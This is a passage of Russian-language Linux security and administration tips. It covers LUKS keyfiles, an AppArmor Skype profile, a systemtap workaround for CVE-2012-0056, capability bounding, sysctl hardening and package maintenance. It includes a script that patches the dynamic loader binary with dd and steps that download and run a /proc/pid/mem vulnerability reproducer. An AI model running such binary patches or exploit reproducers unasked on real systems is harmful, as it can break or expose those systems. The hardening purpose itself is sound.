нужно изменить настройки /etc/crypttab, указав путь к сгенерированному ключу: cr_root UUID=<UUID> /etc/cryptsetup-keys.d/luks-<UUID>.key luks Для систем с dracut необходимо добавить hook ключа в /etc/dracut.conf.d, а для Debian также потребуется указать маску определения файла с ключом: cryptodisk.conf install_items+=" /etc/cryptsetup-keys.d/* " echo "KEYFILE_PATTERN=\"/etc/cryptsetup-keys.d/*\"" >>/etc/cryptsetup-initramfs/conf-hook Теперь можно перегенерировать образ RAM-диска начальной загрузки. После попытки загрузки пароль будет спрошен один раз только на стадии запуска GRUB и на последующих стадиях загрузки запрашиваться не будет.

Отключение LD_PRELOAD в Linux (доп. ссылка 1) [комментарии]

Для блокирования работы переменной окружения LD_PRELOAD, позволяющей принудительно загрузить разделяемую библиотеку со своими обработчиками для функций используемых в программе библиотек, можно использовать следующий скрипт. ldpreload-disable.sh: #!/bin/bash if [ $# -lt 1 ];then printf "./ldpreload-disable.sh [ld-linux.so] [64|32]\n" exit 0 fi ld_linux="$1" [ "$2" == "64" ] && xor='\x48' || xor='' offset=$((16#$(readelf -s $ld_linux | awk '/do_preload/ {print $2}'))) printf $xor'\x31\xc0\xc3' | dd conv=notrunc of=$ld_linux bs=1 seek=$offset Пример использования для 64-разрядной системы: $ sudo bash ldpreload-disable.sh $HOME/fedora-chroot/lib64/ld-2.22.so 64 для 32-разрядной системы: $ sudo bash ldpreload-disable.sh $HOME/fedora-chroot/lib/ld-2.22.so 32

Запуск Skype в изолированном окружении Apparmor (доп. ссылка 1) [комментарии]

Для защиты от потенциального доступа закрытого приложения Skype к данным других программ можно организовать выполнение Skype в изолированном окружении. Создаём профиль Apparmor на основе тестового запуска приложения: sudo genprof /usr/bin/skype После этого будет создан профиль для сбора информации о работе приложения. В другой консоли запускаем Skype, делаем тестовый вызов и выходим из Skype. Повторно запускаем: sudo genprof /usr/bin/skype и инициируем сканирование накопленных событий, выбрав "S". В процессе вывода результатов выбираем что можно процессу, а что нет. В завершении жмём "S" для сохранения профиля и "F" для выхода. Профиль будет создан в файле /etc/apparmor.d/usr.bin.skype Если нет желания разбираться с составлением правил вручную можно использовать готовый профиль: #include <tunables/global> /usr/bin/skype { #include <abstractions/audio> #include <abstractions/base> #include <abstractions/fonts> #include <abstractions/nameservice> #include <abstractions/nvidia> /etc/gai.conf r, /home/*/.ICEauthority r, /home/*/.Skype/** krw, /home/*/.Xauthority r, /home/*/.config/* kr, /home/*/.kde/share/config/kioslaverc r, /proc/*/cmdline r, /tmp/.ICE-unix/* w, /tmp/.X11-unix/* w, /usr/bin/skype mr, /usr/share/X11/* r, /usr/share/icons/** r, /usr/share/skype/** kr, } Перезапускаем AppArmor: sudo /etc/init.d/apparmor restart Активируем работу Skype в sandbox-окружении Apparmor: sudo aa-enforce skype Проверяем результат: sudo sudo apparmor_status

Использование systemtap для устранения уязвимости в реализации /proc/pid/mem (доп. ссылка 1) [комментарии]

Для устранения уязвимости CVE-2012-0056 в /proc/pid/mem без обновления ядра Linux можно использовать systemtap для ограничения системного вызова. Systemtap из коробки доступен в RHEL/CentOS и может быть установлен из репозитория в Debian/Ubuntu. Без systemtap обходным путем решения проблемы является блокирования доступа пользователя на запуск setuid-программ. Проверим, уязвима ли наша система. Для этого загружаем, собираем и запускаем специальную проверочную утилиту: $ wget http://grsecurity.net/~spender/correct_proc_mem_reproducer.c $ make correct_proc_mem_reproducer $ ./correct_proc_mem_reproducer vulnerable Рассмотрим процесс установки и использования systemtap в Ubuntu и Debian. Установим systemtap и пакет для отладки ядра (занимает около 2 Гб) Debian: sudo apt-get install -y systemtap linux-image-$(uname -r)-dbg Ubuntu (требуется подключение отладочного репозитория): sudo apt-get install -y lsb-release echo "deb http://ddebs.ubuntu.com/ $(lsb_release -cs) main restricted universe multiverse" | \\ tee -a /etc/apt/sources.list.d/ddebs.list sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ECDCAD72428D7C01 sudo apt-get update sudo apt-get install -y systemtap linux-image-$(uname -r)-dbgsym Если в процессе выполнения "apt-get update" выведена ошибка, загружаем и устанавливаем отладочные пакеты с ядром вручную: sudo apt-get install -y systemtap dpkg-dev wget http://ddebs.ubuntu.com/pool/main/l/linux/$(dpkg -l linux-image-$(uname -r) | \\ grep ^ii | awk '{print $2 "-dbgsym_" $3}' | tail -n1)_$(dpkg-architecture -qDEB_HOST_ARCH).ddeb sudo dpkg -i linux-image-$(uname -r)-dbgsym.ddeb Создаём systemtap-скрипт proc-pid-mem.stp для блокирования уязвимости (в функции mem_write изменяем на ноль значение аргумента count, определяющего размер записываемых данных): probe kernel.function("mem_write@fs/proc/base.c").call { $count = 0 } Запускаем скрипт: sudo stap -Fg proc-pid-mem.stp Убедимся, что уязвимость теперь не проявляется: $ ./correct_proc_mem_reproducer not vulnerable Чтобы каждый раз не компилировать модуль systemtap, можно собрать его загодя: stap -g -m cve_2012_0056 proc-pid-mem.stp -p4 (опция "-g" включает режим гуру, при котором допускается изменение параметров функций, опция -m cve_2012_0056 задаёт имя модуля, -p4 указывает на необходимость остановиться на 4 шаге и не загружать модуль) Копируем созданный модуль в область с модулями ядра: mkdir /lib/modules/$(uname -r)/systemtap cp cve_2012_0056.ko /lib/modules/$(uname -r)/systemtap Запускаем модуль: staprun -L cve_2012_0056 Достоинство использования готового модуля в том, что для его запуска нет необходимости в отладочных пакетах (для сборки они нужны), т.е. его можно скопировать на другие системы с той же версией ядра Linux. По аналогии можно вклиниваться в работу других системных вызовов. Некоторые примеры: Запрет на создание файлов с определённым именем: #!/usr/bin/env stap # badname.stp # Prevent the creation of files with undesirable names. # Source: http://blog.cuviper.com/2009/04/08/hacking-linux-filenames/ # return non-zero if the filename should be blocked function filter:long (name:string) { return isinstr(name, "XXXbadnameXXX") } global squash_inode_permission probe kernel.function("may_create@fs/namei.c") { # screen out the conditions which may_create will fail anyway if ($child->d_inode || $dir->i_flags & 16) next # check that the new file meets our naming rules if (filter(kernel_string($child->d_name->name))) squash_inode_permission[tid()] = 1 } probe kernel.function("inode_permission@fs/namei.c").return !, kernel.function("permission@fs/namei.c").return { if (!$return && squash_inode_permission[tid()]) $return = -13 # -EACCES (Permission denied) delete squash_inode_permission[tid()] } Блокирование работы ptrace: http://sourceware.org/systemtap/examples/process/noptrace.stp Вывод в лог дополнительных данных о всех TCP-соединениях: #! /usr/bin/env stap probe begin { printf("%6s %16s %6s %6s %16s\\n", "UID", "CMD", "PID", "PORT", "IP_SOURCE") } probe kernel.function("tcp_accept").return?, kernel.function("inet_csk_accept").return? { sock = $return if (sock != 0) printf("%6d %16s %6d %6d %16s\\n", uid(), execname(), pid(), inet_get_local_port(sock), inet_get_ip_source(sock)) } Вывод деталей о входе и выходе из функции ядра: #! /usr/bin/env stap # Simple probe to detect when a process is waiting for more socket send # buffer memory. Usually means the process is doing writes larger than the # socket send buffer size or there is a slow receiver at the other side. # Increasing the socket's send buffer size might help decrease application # latencies, but it might also make it worse, so buyer beware. # # Typical output: timestamp in microseconds: procname(pid) event # # 1218230114875167: python(17631) blocked on full send buffer # 1218230114876196: python(17631) recovered from full send buffer # 1218230114876271: python(17631) blocked on full send buffer # 1218230114876479: python(17631) recovered from full send buffer probe kernel.function("sk_stream_wait_memory") { printf("%u: %s(%d) blocked on full send buffer\\n", gettimeofday_us(), execname(), pid()) } probe kernel.function("sk_stream_wait_memory").return { printf("%u: %s(%d) recovered from full send buffer\\n", gettimeofday_us(), execname(), pid()) }

Запрещение загрузки модулей Linux-ядра (доп. ссылка 1) [комментарии]

Повысить безопасность серверов и защитить их от внедрения руткитов в системах на базе Linux-ядра младше 2.6.25 (например, CentOS/RHEL 5) можно используя режим Capability Bounding, включаемый через файл /proc/sys/kernel/cap-bound. Capability Bounding действует на все процессы, если какой-то из Capability-режимов запрещен через /proc/sys/kernel/cap-bound, то использовать данную возможность не сможет ни один процесс, независимо от его привилегий. Используя данный режим можно блокировать для пользователя root возможность загрузки модулей ядра, изменения правил пакетного фильтра, использования raw-сокетов, изменения владельца файлов, монтирования разделов и других системных действий. Посмотреть текущее состояние режима можно командой: cat /proc/sys/kernel/cap-bound а для установки нового значения, можно использовать команду: echo значение > /proc/sys/kernel/cap-bound Значение содержит шестнадцатеричное или десятичное представление битовой маски, кодирующей устанавливаемые флаги. Например, установив режим CAP_SYS_MODULE (для установки нужно очистить бит номер 16): echo $((0xffffffff ^ (1 << 16))) > /proc/sys/kernel/cap-bound или в шестнадцатеричном виде: echo 0xFFFEFFFF > /proc/sys/kernel/cap-bound будет заблокирована загрузка любых модулей ядра. Попытка загрузить или выгрузить модуль приведет к выводу ошибки. modprobe ide_cd приведет к выводу ошибки: FATAL: Error inserting ide_cd (/lib/modules/2.6.18-194.3.1.el5/kernel/drivers/ide/ide-cd.ko): Operation not permitted Изменять /proc/sys/kernel/cap-bound нужно с большой осторожностью, так как установка неверного значения может привести к неработоспособности системы. Установленный флаг уже не может быть изменен, т.е. злоумышленник не может записать 0xFFFFFFFF и отменить установку маски 0xFFFEFFFF. Список других Capability-режимов можно посмотреть в файле /usr/src/linux/include/linux/capability.h: grep '#define CAP' /usr/src/linux/include/linux/capability.h #define CAP_CHOWN 0 #define CAP_DAC_OVERRIDE 1 #define CAP_DAC_READ_SEARCH 2 #define CAP_FOWNER 3 #define CAP_FSETID 4 #define CAP_KILL 5 #define CAP_SETGID 6 #define CAP_SETUID 7 #define CAP_SETPCAP 8 #define CAP_LINUX_IMMUTABLE 9 #define CAP_NET_BIND_SERVICE 10 #define CAP_NET_BROADCAST 11 #define CAP_NET_ADMIN 12 #define CAP_NET_RAW 13 #define CAP_IPC_LOCK 14 #define CAP_IPC_OWNER 15 #define CAP_SYS_MODULE 16 #define CAP_SYS_RAWIO 17 #define CAP_SYS_CHROOT 18 #define CAP_SYS_PTRACE 19 #define CAP_SYS_PACCT 20 #define CAP_SYS_ADMIN 21 #define CAP_SYS_BOOT 22 #define CAP_SYS_NICE 23 #define CAP_SYS_RESOURCE 24 #define CAP_SYS_TIME 25 #define CAP_SYS_TTY_CONFIG 26 #define CAP_MKNOD 27 #define CAP_LEASE 28 #define CAP_AUDIT_WRITE 29 #define CAP_AUDIT_CONTROL 30 #define CAP_SETFCAP 31 #define CAP_MAC_OVERRIDE 32 #define CAP_MAC_ADMIN 33 Описание можно найти в стандартном системном руководстве: man 7 capabilities Возможность /proc/sys/kernel/cap-bound работает только для Linux-ядер до версии 2.6.25. Начиная с ядра 2.6.25 прекращена поддержка глобального общесистемного Capability Bounding, маску можно указывать с использованием системного вызова prctl только для отдельных нитей (установка Capability Bounding для процесса, отражается и на всех его потомках). Для блокирования загрузки модулей в более новых ядрах следует использовать файл /proc/sys/kernel/modules_disabled (для запрета загрузки модулей в него достаточно записать 1).

Создание шифрованного загрузочного LiveUSB c Debian GNU/Linux (доп. ссылка 1) [комментарии]

Добавление Loop-AES шифрования к Debian Live. Устанавливаем пакет для создания livecd сборки debian (все операции проводятся под пользователем root): apt-get install live-helper Создаем директорию в которой будем производить сборку (на диске должно быть минимум 3 Гб свободного места): mkdir DebianLive cd DebianLive Определяем конфигурацию LiveCD: lh_config -b usb-hdd -d lenny -e aes256 При необходимости правим параметры или удаляем/добавляем пакеты через правку настроек в созданной директории config/: Дополнительные пакеты можно поместить в config/chroot_local-packages/ Список пакетов из стандартных репозиториев в config/chroot_local-packageslists/ (готовый список в /usr/share/live-helper/lists/) Помещаемые на LiveUSB дополнительные файлы можно скопировать в config/chroot_local_includes/, например для добавления /etc/privoxy/config, его нужно скопировать как config/chroot_local-includes/etc/privoxy/config Запускаем процесс сборки LiveCD: lh_build в процессе работы скрипт потребует два раза ввести пароль, под которым будет осуществляться доступ к содержимому LiveUSB. Далее копируем получившийся образ на usb flash /dev/sdc: dd if=binary.img of=/dev/sdc bs=1M Шифрование используется для безопасного хранения на LiveUSB таких данных как PGP ключи, сохранные в firefox ключи и пароли. Некоторые полезные опции lh_config: -d lenny - имя релиза (lenny|squeeze|sid) -b usb-hdd - тип итогового образа (iso|net|tar|usb-hdd) -e aes256 - тип шифрования (aes128|aes192|aes256) --mirror-bootstrap http://192.168.100.1:3142/ftp.de.debian.org/mirror/debian/ --mirror-chroot http://192.168.100.1:3142/ftp.de.debian.org/mirror/debian/ --mirror-chroot-security http://192.168.100.1:3142/security.debian.org/ перенаправление к локальному apt-proxy --debian-installer enabled - добавить инсталлятор Debian в Live-образ --debian-installer-distribution lenny - выбор дистрибутива для инсталлятора (lenny|squeeze|sid) --packages-lists "my_package_list" установить пакеты определенные в config/chroot_locale-packageslist/my_package_list --bootstrap-flavour minimal --packages-lists "minimal" - формирование минимального образа, размером около 100 Мб

Изменение метода хэширования паролей в Red Hat подобных дистрибутивах (доп. ссылка 1) [комментарии]

В будущих версиях RHEL и Fedora Linux появится возможность использования для хэширования паролей алгоритмов SHA-256 и SHA-512 В Kickstart режиме: DES authconfig --enableshadow --passalgo=descrypt MD5 authconfig --enableshadow --enablemd5 или authconfig --enableshadow --passalgo=md5 SHA-256 authconfig --enableshadow --passalgo=sha256 SHA-512 authconfig --enableshadow --passalgo=sha512 Тип хэша также можно задать через /etc/logis.desf, присвоив переменной ENCRYPT_METHOD значение DES, MD5, SHA256 или SHA512

Настройка аутентификации по отпечаткам пальцев в Ubuntu Linux [комментарии]

Устанавливаем пакеты необходимые для сборки системы fprint: aptitude install libpam0g-dev libusb-dev libmagick9-dev libglib2.0-dev libssl-dev aptitude install libgtk2.0-dev libx11-dev libxv-dev # если будет сборка с поддержкой x11 Загружаем libfprint и pam_fprint с сайта http://www.reactivated.net/fprint Собираем стандартно через: ./configure make make install Или пересобираем готовые Debian пакеты: --- Качаем .dsc, tar.gz и diff.gz со страниц http://packages.debian.org/experimental/libfprint0 http://packages.debian.org/experimental/libpam-fprint Устанавливаем доп. пакеты необходимые для сборки: aptitude install fakeroot autotools-dev debhelper dpkg-dev dpkg-source -x libfprint_0.0.5-2.dsc cd libfprint-0.0.5 dpkg-buildpackage -rfakeroot Пакет libpam-fprint создается по аналогии --- Генерируем слепок отпечатка указательного пальца (запускаем под логином для которого сохраняем отпечаток): pam_fprint_enroll --enroll-finger 7 Для опциональной аутентификации по отпечатку (возможность ввести пароль остается), в /etc/pam.d/common-auth первой строкой ставим: auth sufficient pam_fprint.so Если пускать в систему нужно только после сверки отпечатка, "sufficient" заменяем на "required". PS. В Gentoo Linux добавляем в /etc/pam.d/system-auth перед строкой c pam_unix.so

Изменение атрибутов ext2fs и ext3fs используя chattr (доп. ссылка 1) [обсудить]

Команда chattr позволяет изменять параметры ФС для отдельного файла или директории: chattr +a - только добавление данных (append-only), удаление и переименование запрещено; chattr +i - запрещено удаление, изменение или переименование (immutable); chattr +A - запретить сохранение данных о каждом обращении к файлу (no atime) chattr +S - синхронное изменение всех данных на диск, без кэширования; chattr +c - файл будет хранится на диске в сжатом виде (нужен отдельный патч для ядра); chattr +s - после удаления файла, место на диске забивается нулями (внешний патч); chattr +u - резервирование данных файла после удаления (внешний патч); Пример: chattr -R +i /bin /sbin /usr/bin /usr/sbin - запрещаем изменение бинарников chattr +a /var/log/secure - предотвращаем модификацию лога злоумышленником Для просмотра расширенных атрибутов используется утилита lsattr. Для FreeBSD см. man chflags и man security

Как защитить Linux от некоторых DoS атак. [комментарии]

Настройки для увеличения безопасности: /sbin/sysctl -w net.ipv4.conf.all.send_redirects=0 /sbin/sysctl -w net.ipv4.conf.all.accept_redirects=0 /sbin/sysctl -w net.ipv4.conf.all.accept_source_route=0 /sbin/sysctl -w net.ipv4.conf.all.mc_forwarding=0 /sbin/sysctl -w net.ipv4.icmp_echo_ignore_broadcasts=1 /sbin/sysctl -w net.ipv4.icmp_ignore_bogus_error_responses=1 /sbin/sysctl -w net.ipv4.conf.all.log_martians=1 /sbin/sysctl -w net.ipv4.conf.all.rp_filter=1

Как в linux преобразовать /etc/passwd в shadow [обсудить]

/usr/sbin/pwconv

Как в linux разрешить su только для членов группы wheel [комментарии]

Добавить в /etc/pam.d/su auth required pam_wheel.so

Установка и работа с пакетами программ в Linux

Перекомпиляция пакета с icq клиентом в Ubuntu/Debian и Fedora/RHEL/CentOS Linux [комментарии]

Рассмотрим внесение патча c исправлением на примере пакета licq в Ubuntu Linux. Убедимся, что в /etc/apt/sources.list присутствует строчка: deb-src http://archive.ubuntu.com/ubuntu/ intrepid main universe restricted multiverse Обновляем список пакетов: apt-get update Загружаем файлы, необходимые для сборки пакета licq: apt-get source licq Устанавливаем окружение, необходимое для сборки пакетов: apt-get install devscripts apt-get install build-essential apt-get install fakeroot Сохраняем наш патч в licq-rus-login.patch (ссылки на патчи с исправление проблемы коннекта icq можно найти здесь - https://www.opennet.ru/opennews/art.shtml?num=19883) Накладываем наш патч: cd ./licq-1.3.6/src cat ../../licq-rus-login.patch| patch -p0 cd ../.. Загружаем дополнительные пакеты с библиотеками и программами от которых зависит licq: apt-get build-dep licq Собираем пакет: fakeroot apt-get -b source licq Устанавливаем пакет: dpkg -i licq_*.deb licq-plugin-gt*.deb PS. Для Pingin собирать нужно libpurple0 ---------------- Для Fedora Linux процесс пересборки будет выглядеть так: Загружаем SRC-пакет licq: wget http://mirror.yandex.ru/fedora/linux/releases/10/Everything/source/SRPMS/licq-1.3.5-4.fc10.src.rpm Устанавливаем его: rpm -ivh licq-1.3.5-4.fc10.src.rpm Переходим в директорию /usr/src/redhat/SOURCES и копируем туда свой патч licq-rus-login.patch Переходим в директорию /usr/src/redhat/SPECS/ и в файле licq.spec добавляем две строки: ... Patch3: licq-rus-login.patch ... %patch3 -p1 -b .licq-rus-login Собираем пакет: rpmbuild -ba licq.spec Устанавливаем собранные пакеты: cd /usr/src/redhat/RPMS/i386 rpm -Uvh --force licq-*

Linux окружение noroot в Android-смартфоне собственными руками. (доп. ссылка 1) Автор: Павел Оредиез [комментарии]

В этой заметке я расскажу как собрать своё Linux-окружение на Android-смартфоне без прав root (рутовать телефон не надо). Можно конечно взять готовые решения в Google Play Store, но можно и пройти этот путь самостоятельно. Если вы решите повторить мой опыт, то вы получите Xfce4-окружение с псевдо пользователем root на своём мобильном телефоне с Android. Работает это почти без отличий от реального пользователя root, только конечно модифицировать сам телефон это возможности не даёт. Итак приступим. Termux Установим в Android приложение Termux (требуется Android версии 7 или выше). Это наше базовое Linux окружение и отправная точка. Запуская его мы попадаем в шелл с домашним каталогом, который будем называть TERMUX_HOME. Итак в TERMUX_HOME установим требуемые нам начальные пакеты: pkg install root-repo pkg install proot pkg install debootstrap pkg install nano pkg install wget pkg install man Debootstrap Теперь можно устанавливать Linux окружение. Проверим нашу архитектуру. uname -ar Linux localhost 4.9.193-perf-gc285628 #1 SMP PREEMT Fri Aug 6 02:12:50 CST 2021 aarch64 Android Моя архитектура 64-битная, значит --arch=arm64. Если у вас архитектура 32-битная, то ваш вариант --arch=armhf В TERMUX_HOME: mkdir ./chroot debootstrap --arch=arm64 bullseye ./chroot http://mirror.yandex.ru/debian mkdir ./chroot/system mkdir ./chroot/apex mkdir ./chroot/home/user Вот мы получили базовое окружение. Правда dpkg configure отработает наверное с некоторыми ошибками, но войти в окружение уже можно. Ошибки мы разберём позже. Вход в Linux окружение Вход под псевдо рутом нам позволяет команда proot, которую мы установили ранее. В TEMUX_HOME создадим скрипт входа start.sh: #!/data/data/com.termux/files/usr/bin/sh unset LD_PRELOAD proot \ -0 \ --link2symlink \ -w /root \ -r ./chroot \ -b /sys/ \ -b /system \ -b /apex \ -b /proc/ \ -b /dev/ \ -b /dev/pts/ \ /usr/bin/env \ -i \ HOME=/root \ LD_LIBRARY_PATH=/system/lib64:/system/apex/com.android.runtime.release/lib64 \ XDG_RUNTIME_DIR=/tmp \ DISPLAY=127.0.0.1:0 \ PULSE_SERVER=tcp:127.0.0.1:4713 \ TERM="xterm-256color" \ PATH=/bin:/usr/bin:/sbin:/usr/sbin \ /bin/bash --login Для входа не под root (опционально) создайте скрипт входа ustart.sh: #!/data/data/com.termux/files/usr/bin/sh unset LD_PRELOAD proot \ --link2symlink \ -w /root \ -r ./chroot \ -b /sys/ \ -b /system \ -b /apex \ -b /proc/ \ -b /dev/ \ -b /dev/pts/ \ /usr/bin/env \ -i \ HOME=/home/user \ LD_LIBRARY_PATH=/system/lib64:/system/apex/com.android.runtime.release/lib64 \ XDG_RUNTIME_DIR=/tmp \ DISPLAY=127.0.0.1:0 \ PULSE_SERVER=tcp:127.0.0.1:4713 \ TERM="xterm-256color" \ PATH=/bin:/usr/bin:/sbin:/usr/sbin \ /bin/bash --login Для 32-битного окружение поправьте LD_LIBRARY_PATH Сделаем скрипты исполняемыми: chmod a+x start.sh chmod a+x ustart.sh Теперь можно войти в окружение: ./start.sh root@localhost:~# Вот мы и псевдо root :). Назовём это ENV_HOME. Ошибки dpkg Ошибки dpkg в основном у меня были связаны с неправильной работой утилиты adduser при добавлении системных пользователей. Поэтому чтобы избежать их сразу дополним файлы (в ENV_HOME) /etc/passwd: systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin _apt:x:103:65534::/nonexistent:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin statd:x:106:65534::/var/lib/nfs:/usr/sbin/nologin avahi:x:108:113:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin systemd-coredump:x:996:996:systemd Core Dumper:/:/usr/sbin/nologin user:x:10264:10264:User:/home/user:/bin.bash /etc/group: systemd-journal:x:101: systemd-timesync:x:102: systemd-network:x:103: systemd-resolve:x:104: netdev:x:109:pi messagebus:x:110: avahi:x:113: systemd-coredump:x:996: user:x:10264: Здесь id 10264 это id моего пользователь в TERMUX_HOME. У вас может быть другое число. Второй хук для неисправных пакетов заключается в убирании скриптов конфигурирования (в ENV_HOME): mv /var/lib/dpkg/info/<package>* /tmp/ Установка остальных пакетов В ENV_HOME выполним apt install xfce4 dbus-x11 Мы готовы запустить графическую оболочку, для этого нам нужен X сервер. X сервер В Android установите приложение XServer XSDL. Этот сервер имеет также звуковую pulseaudio подсистему. Ранее в скриптах входа в окружение в команде proot мы передали переменные DISPLAY и PULSE_SERVER, так что у нас все готово для запуска (в ENV_HOME): xfce4-session Должна запуститься графическая оболочка, звук тоже должен работать (звуковой вход не поддерживается только воспроизведение). Xserver XSDL может показаться сначала не очень красивым, но он хорошо функционален и красоты можно добиться. Мои параметры: ориентация портретная, разрешение нативное, дурацкие кнопки alt-shift-чего-то скрыты (они у меня всё равно не работают или я не понял как), мышь в режиме телефон-тачпад. Можно еще попробовать поиграться с xrandr если поддерживается для использования виртуального пространства X сервера, я не пробовал. Библиотеки Android В аргументах команды proot мы пробросили в окружение Android каталоги /system и /apex. Так что нам доступны Android библитеки /system/lib /system/lib64. Например мне нужно было чтобы правильно отрабатывала команда ldd /system/lib64/libOpenSLES.so (не должно быть "not found"). Если ldd отрабатывает неправильно, то обратите внимание, библиотеки в /system/lib* могут быть симлинками на другие места. Возможно надо подбиндить другие каталоги Android и(или) поправить LD_LIBRARY_PATH. Благодарности Выражаю свою благодарность Sergii Pylypenko (pelya) за его труд - автору проектов XServer XSDL, pulseaudio-android, xserver-xsdl, Debian noroot. У него я подсмотрел многое.

Получаем патчи безопасности для Ubuntu 16.04 (доп. ссылка 1) Автор: Владимир [комментарии]

У операционной системы Ubuntu 16.04 закончилась основная поддержка https://wiki.ubuntu.com/Releases Пользователи Ubuntu 16.04 могут продолжить получать патчи безопасности для своей системы до 2024 года, но для этого требуется подключение к программе Ubuntu Advantage. На один аккаунт можно добавить 3 машины (бесплатно для персонального использования), получив ключ по ссылке https://ubuntu.com/advantage Free for personal use Anyone can use UA Infrastructure Essential for free on up to 3 machines (limitations apply). All you need is an Ubuntu One account. В последнем обновлении поставляется утилита ua с помощью которой происходит подключение к сервису user@ubuntu:~$ sudo ua attach Ca1********** [sudo] пароль для user: Enabling default service esm-infra Updating package lists UA Infra: ESM enabled Enabling default service livepatch Installing snapd Updating package lists Installing canonical-livepatch snap Canonical livepatch enabled. This machine is now attached to '*****@gmail.com' SERVICE ENTITLED STATUS DESCRIPTION esm-infra yes enabled UA Infra: Extended Security Maintenance (ESM) fips yes disabled NIST-certified FIPS modules fips-updates yes disabled Uncertified security updates to FIPS modules livepatch yes enabled Canonical Livepatch service Также для систем которые ещё актуальны (ubuntu 18.04, 20.04) существует сервис livepatch, поставляющий патчи для ядра Linux, устанавливаемые без перезагрузки. Данный сервис также бесплатен для 3 машин на аккаунт.

Просмотр зависимостей пакета и принадлежности файла пакету в Linux [комментарии]

Для просмотра от каких пакетов зависит пакет gnome-calculator: Debian/Ubuntu: apt depends gnome-calculator Fedora/CentOS/RHEL: dnf deplist gnome-calculator SUSE: zypper se --requires gnome-calculator Для просмотра какие другие пакеты зависят от пакета gnome-calculator: Debian/Ubuntu: apt rdepends gnome-calculator Fedora/CentOS/RHEL: rpm -q --whatrequires gnome-calculator dnf repoquery --whatrequires gnome-calculator Для просмотра какому пакету принадлежит файл /usr/bin/gnote Debian/Ubuntu: dpkg -S /usr/bin/gnote apt-file /usr/bin/gnote Fedora/CentOS/RHEL: rpm -qf /usr/bin/gnote dnf provides /usr/bin/gnote SUSE: zypper wp /usr/bin/gnote

Улучшение безопасности sources.list в дистрибутивах, использующих APT (доп. ссылка 1) Автор: KOLANICH [комментарии]

Опция "signed-by" привязывает доверенный публичный ключ к репозиторию, что блокирует установку ПО в случае, если InRelease подписан другим ключом. Опция может быть установлена как в fingerprint ключа, так и в форме пути к файлу. Это позволяет защититься от некоторых атак в следующей модели угроз: 1. допустим, что есть репозиторий, доступный по скомпрометированному каналу, чей приватный ключ не может быть скомпрометирован; 2. допустим, что есть репозиторий, доступный по безопасному каналу, чей приватный ключ был скомпромитирован; 3. оба репозитория прописаны в sources.list и оба ключа добавлены в доверенные. Тогда, если нет привязки, злоумышленник может использовать скомпрометированный ключ второго репозитория для подписи поддельного InRelease для первого репозитория, получая RCE. Поэтому в https://wiki.debian.org/DebianRepository/UseThirdParty рекомендуется прописывать всем сторонним репозиториям "signed-by", при этом указано использовать путь к ключу вместо fingerprint-а. По моему мнению, имеет смысл прописывать signed-by вообще всем репозиториям. В дистрибутивах, использующих APT, почему-то по умолчанию не используется опция signed-by. В инструкциях по подключению других репозиториев тоже почти никогда не встречаются указания её использовать. Так как ручная идентификация ключей для каждого репозитория - дело трудоёмкое, был подготовлен скрипт, разбирающий sources.list, автоматически идентифицирующий fingerprint-ы и файлы ключей для каждого репозитория и выдающий модифицированный sources.list для сравнения с оригинальным. В скрипте используется собственная библиотека для парсинга и сериализации sources.list на основе грамматики для parglare.

Обновление версии Fedora из командной строки (доп. ссылка 1) (доп. ссылка 2) [комментарии]

При выходе новой версии Fedora приложение GNOME Software автоматически предлагает перейти на новый релиз, не покидая графический интерфейс. Для тех кому необходимо выполнить обновление из командной строки, можно использовать следующую последовательность команд. Обновляем текущее окружение до самого свежего состояния: sudo dnf upgrade --refresh Устанавливаем плагин к DNF для обновления выпусков дистрибутива: sudo dnf install dnf-plugin-system-upgrade Запускаем загрузку пакетов для обновления до релиза Fedora 29: sudo dnf system-upgrade download --releasever=29 В случае проблем с нарушением зависимостей, устаревшими и необновляемыми пакетами можно использовать опцию "--allowerasing" для удаления проблемных пакетов. После окончания загрузки новых пакетов инициируем применение обновлений после перезагрузки системы: sudo dnf system-upgrade reboot После завершения обновления система ещё раз перезагрузится. Если в новой системе выводится сообщение о повреждении БД RPM, можно перегенерировать индекс пакетов: sudo rpm --rebuilddb Если после обновления часть пакетов осталась необновлена или наблюдаются проблемы с зависимостями, можно попробовать вручную запустить distro-sync: sudo dnf distro-sync или с удалением проблемных пакетов sudo dnf distro-sync --allowerasing В случае предупреждений о недопустимости выполнения операций из-за ограничений SELinux можно перегенерировать метки SELinux: sudo fixfiles onboot

Как очистить ранее установленные старые ядра Linux в Ubuntu, RHEL и Fedora (доп. ссылка 1) [комментарии]

В Ubuntu после установки очередного обновления ядра Linux, ранее использованное ядро сохраняется. Со временем старые ядра и связанные с ними заголовочные файлы съедают ощутимую часть дискового пространства и их приходится чистить, вручную выбирая для удаления оставленные пакеты. Начиная с Ubuntu 16.04 в репозиторий добавлен пакет byobu, в котором имеется скрипт purge-old-kernels, предназначенный для очистки старых ядер. Устанавливаем пакет: sudo apt install byobu (в более ранних выпусках утилита находилась в пакете bikeshed) или загружаем скрипт отдельно: wget https://raw.githubusercontent.com/dustinkirkland/byobu/master/usr/bin/purge-old-kernels Проводим чистку старых ядер: sudo purge-old-kernels По умолчанию после выполнения этой команды в системе будет оставлено два самых свежим пакета с ядром. При желании число оставленных пакетов можно изменить при помощи опции "--keep", например: sudo purge-old-kernels --keep 3 Скрипт достаточно прост: KEEP=2 APT_OPTS= CANDIDATES=$(ls -tr /boot/vmlinuz-* | head -n -${KEEP} | grep -v "$(uname -r)$" | cut -d- -f2- | awk '{print "linux-image-" $0 " linux-headers-" $0}' ) for c in $CANDIDATES; do dpkg-query -s "$c" >/dev/null 2>&1 && PURGE="$PURGE $c" done if [ -z "$PURGE" ]; then echo "No kernels are eligible for removal" exit 0 fi apt $APT_OPTS remove --purge $PURGE В Red Hat Enterprise Linux и CentOS для чистки старый ядер можно использовать утилиту package-cleanup, которая входит в состав пакета yum-utils. Например, чтобы оставить только два последних ядра можно выполнить: package-cleanup --oldkernels --count=2 В Fedora для решения аналогичной задачи можно воспользоваться штатным DNF: dnf remove $(dnf repoquery --installonly --latest-limit -2 -q)

Автоматическая установка Debian с помощью preseed (доп. ссылка 1) Автор: l8saerexhn1 [комментарии]

